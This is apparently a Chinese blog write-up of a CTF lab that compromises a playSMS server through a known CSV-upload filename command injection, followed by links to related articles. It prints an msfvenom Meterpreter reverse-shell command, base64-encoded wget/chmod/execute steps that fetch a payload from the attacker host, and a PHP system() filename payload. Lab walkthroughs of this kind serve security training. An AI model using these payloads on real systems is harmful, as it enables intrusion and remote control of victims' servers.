php伪协议注入工具,CTF—攻防练习之HTTP—命令注入

最新推荐文章于 2024-07-22 14:33:58 发布
最新推荐文章于 2024-07-22 14:33:58 发布
阅读量256 收藏 1
点赞数
文章标签: php伪协议注入工具

主机:192.168.32.152

靶机:192.168.32.167

首先nmap,nikto -host,dirb 探测

robots.txt目录下

在/nothing目录中,查看源码发现pass

2ee2a0931a95cbdec26ae0c0dafd51c2.png

在secure目录下发现一个zip文件,下载下来,发现密码freedom即可打开

然后发现mp3文件其实是text文本,cat打开

ffbbc97b5bfb1e4e64563930134d4564.png

118d71a4edcb4ad6a534fce09bbe54d7.png

发现一段文字还有个url,打开url,用户:touhid,密码尝试出为diana

3e819941a6c5fc60f1e47c4bb51d3fb5.png

进入了页面

c6e866ad67730ec15ecd68ea80bab090.png

然后我们就看一看当前cms有没有已知的可利用漏洞,searchsploit playSMS

49df3c24176de311335c0368947b8650.png

该漏洞目录是  /usr/share/exploitdb/exploits/php/webapps/42003.txt cat下,cat下该漏洞查看该漏洞描述

ffe8e9d301bf1c863b6d2690a6bb6a18.png

大致意思就是说存在一个上传点,但文件名要改成另一种格式,就可执行和上传文件相关的代码

目录在app=main&inc=core_welcome,打开确实有上传点,上传csv文件的点

a0b10fd820dfec9c12739c194721c36c.png

用bp上传抓包改文件名测试下,确实存在命令注入

a9d1ab1f29c94310de5d56c4faf8f618.png

那我们就可以制作并上传一个反弹shell

shell为: linux/x86/meterpreter/reverse_tcp

msfvenom -p生成

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.32.152 lport=4444 elf> /var/www/html/s

重定向到apache服务器,通过执行下载命令,再修改权限

再用msfconsole监听即可

首先开启apache服务器:

survice apache2 start     开启

survice apache2 status  查看状态

再利用命令注入漏洞上传,使用命令注入漏洞时,我们可以先用base64转码绕过防火墙

echo 'wget http://192.168.32.152/s -O /tmp/a' | base64

echo 'chmod 777 /tmp/a' | base64

echo '/tmp/a' | base64

再在bp 中用命令  "<?php system(base64_decode('XXXXXXXX')); dia();?>.php"

最终完成三个命令上传拿到反弹shell

Mr.括号
关注
[CISCN2019 华北赛区 Day1 Web5]CyberPunk(php://伪协议,报错注入,二次注入
xlcvv的博客
04-27 444
进到页面: (说到赛博朋克,tM居然跳票了,令人烦躁) 老规矩F12: 有个hint,见到file就想到了熟悉的php://伪协议,payload: /index.php?file=php://filter/convert.base64-encode/resource=index.php 返回一大串base64编码内容,解码一下: <?php //index.php ini_set('...
文件包含与PHP伪协议实战演练
墨子辰的博客
01-28 574
目录一、PHP中造成文件包含的四个函数二、本地文件包含、远程文件包含的区别三、PHP伪协议测试代码目标文件常用协议1、目录遍历获取flag2、php://input、php://filter3、file://4、data://5、zip:// 一、PHP中造成文件包含的四个函数 1、include() 、require() 当使用include()函数包含文件时,只有代码执行到 include() 函数时才将文件包含进来,发生错误时只给出一个警告,继续向下执行。 当使用require()函数包含文件时,只要
CTF比赛必备常用工具
最新发布
dzqxwzoe的博客
07-22 909
在解题模式CTF赛制中,参赛队伍可以通过互联网或者现场网络参与,这种模式的CTF竞赛与ACM编程竞赛、信息学奥赛比较类似,以解决网络安全技术挑战题目的分值和时间来排名,通常用于在线选拔赛。主要包括六大类:PWN、CRYPTO(解密)、REVERSE(逆向)、WEB、MISC(杂项)其中, REVERSE(逆向)和MISC(杂项),在比赛中要使用大量的辅助工具,才能快速解题。本文章也主要聚焦这两类赛题的工具
CTFHTTP命令注入
IT小学子的博客
05-04 504
主机:192.168.32.152   靶机:192.168.32.167 首先nmap,nikto -host,dirb 探测 robots.txt目录下 在/nothing目录中,查看源码发现pass 在secure目录下发现一个zip文件,下载下来,发现密码freedom即可打开 然后发现mp3文件其实是text文本,cat打开 发现一段文字还有个url,打开url,用户...
http注入
姜小孩的博客
10-23 348
原理 有些时候,后台开发人员为了验证客户端头信息(比如常用的cookie验证),或者通过http header头信息获取客户端的一些资料,比如useragent、accept字段等。会对客户端的http header信息进行获取并使用sql进行处理,如果此时没有足够的安全考虑则可能会导致基于http header的sql inject漏洞。 适用场景: 网站会读取用户的一些信息 使用: sql-labs第十八关,发现她会抓取我们的ip,那么我们就可以用burp抓包,将代理模块的http历史记录中抓
CTF实验:web安全命令注入
floyd_art的博客
04-14 1094
信息探测 扫描主机服务信息以及服务版本 – nmap -sV 靶场IP地址 快速扫描主机全部信息 – nmap -T4 -A -v 靶场IP地址 探测目录信息 – nikto -host http://靶场IP地址:端口 – dirb http://靶场IP地址:端口 可利用信息 – robots.txt – nothing – secure – backup.zip 对于每一...
CTF从入门到提升之宽字节注入
anquanniu的博客
08-15 1483
CTF入门到放弃 为什么说是从入门到放弃呢?(开个玩笑)如果说大家对CTF有了解的话,其实应该知道CTF是一个什么类型的比赛,这个比赛涉及的范围和影响有多大。如果说你真的想打好比赛,那也是真的非常不容易的,所以说这是非常困难的一件事情,初期可能学着学着就想放弃了,所以我就以这个来作为一个标题,当然本意不是让大家去放弃,就是为了让大家入个门然后再提升! 我会和我朋友一起来完成这门课程的讲解。 课程主...
网络安全练习网站大全.rar
10-16
sql注入https://redtige web:http://hackin 综合:http://www.wechal 综合性黑客game:http://www. 综合性新平台CTFhttps://lab.pe ...很多,这里就不一一列举了,对了还有一些社会工程学练习网站
php upload ctf,强网杯CTF防御赛ez_upload Writeup
weixin_35645813的博客
03-17 1192
这是强网杯拟态防御线下赛遇到的web题目,本来是不打算分享Writeup的,但是由于问的人很多,于是这里分享给大家。ez_upload这题算是非常经典的堆叠black trick的题目,算是比较典型的ctf式题目(虽然现在大家都很抵制这样的题目),这里主要是分享Writeup以及我们队在完成题目时的思考流程。ez_upload 思考流程最开始我先描述一下题目逻辑。1、login.php,登陆页面,...
006-CTF web题型总结-第六课 CTF WEB实战练习(二) .pdf
07-09
本篇内容主要针对CTF Web实战练习进行了总结,分为入门的第一部分和第二部分,涵盖了多个不同类型的题目,旨在帮助学习者提升Web安全攻防能力。 **入门第一部分** 1. **bugku-ctf 第一题:成绩单** 这个题目可能...
[网络安全自学篇] 三十九.hack the box渗透之DirBuster扫描路径及Sqlmap高级注入用法(三)
热门推荐
杨秀璋的专栏
01-15 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文详细讲解了hack the box在线渗透平台注册过程,以及Web渗透三道入门题目,包括Python编写md5加密发送Post、万能密码和URL路径猜测、BurpSuite和Hydra密码爆破等。这篇文章将通过两个题目分享DirBuster扫描目录、Fuzzy爆破指定路径名称,通过Sqlmap工具实现SQL注入并获取管理员用户名和密码、文件下载等用法。希望您喜欢~
CTF 大赛专用工具
06-05
工具不是本人专有,这个是我通过平常整理收集的一些专用且常用的工具
HTTP注入
→_→
07-16 1238
重新认识被人遗忘的HTTP注入 前言 注入类漏洞经久不衰,多年保持在owasp Top 10的首位。今天就聊聊那些被人遗忘的http注入。用简单的实际代码进行演示,让每个人更深刻的去认识该漏洞。 HOST注入 在以往http1.0中并没有host字段,但是在http1.1中增加了host字段,并且http协议在本质也是要建立tcp连接,而建立连接的同时必须知道对方的ip和端口,然后才能发送数据。既然已经建立了连接,那host字段到底起着什么样的的作用? Host头域指定请求资源的Intene.
ASDF题解(php伪协议的简单利用)
dogeace的博客
11-28 253
这一题是我在了解PHP伪协议中无意搜索到的一道题目,对于php中的filter为协议的简单利用有一点练习作用,是一道南邮的题目,下面是这道题目的wp。 题目地址 进入题目我们看到如下的场景 按指示一步一步来我们进入其中 发现有提示test123而且明显是个文件包含的漏洞,我就去尝试了所给的test123.php无事发生,不信邪的我又试了txt的格式也不行。所以我准备看看这个网页的主页面看看是怎么回事。所以我进行了以下尝试。 发现没有报错但是没有显示任何东西,因为我们是执行的文件,代码的执行所以没有显示,
php phar,PHP phar:协议对象注入技术介绍
weixin_27972919的博客
03-11 118
前言在之前的BlackHat 2018大会上公布了一款针对PHP应用程序的全新攻击技术。我们将通过这篇文章简单介绍下。来自Secarma的安全研究员Sam Thomas发现了一种新的开发技术,它可以导致——而无需使用PHPunserialize()函数。这项新技术是在BlackHat 2018大会上公布的,利用升实现远程代码执行。我们在RIPS代码分析引擎中添加了对这种新型攻击的检测。常见样式大多...
【代码审计】伪协议读取+文件名注入漏洞
serendipity1130的博客
11-14 702
1.输入register.php注册账号进行登录,发现url传参,尝试使用伪协议读取user.php: 2.继续读取function.php: 3.发现存在ffffllllaaaaggg,伪协议读取会被重定向到hacker.php,代码审计发现这里存在parse_url漏洞,在user.php前面多加一个/就能使之返回false,从而读取文件: 4. 继续读取m4aaannngggeee,解码后访问templates/upload.html: 5.发现上传点,但是无法上传,尝试...
ctfphp序列化,CTFPHP反序列化和命令注入的一次简单利用
weixin_28956461的博客
03-17 490
代码来自第六届防灾科技学院网络安全技能大赛,侵删。目标获取Linux服务器根目录下的flag代码/*home.php*/class home{private $method;private $args;function __construct($method, $args) {$this->method = $method;$this->args = $args;}function _...
WEB-XML与XXE漏洞-伪协议
qq_43306559的博客
12-04 1311
前言 在做unctf时遇到一道web题,是xml的xxe漏洞(Do you like xml),当时没做出来,没反应过来这个知识点,后来经人指点稍微理解了一些关于这个的漏洞,又在判作业中看到了这个知识点,所以决定记录下来 XML与XXE漏洞及伪协议利用 XML是用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值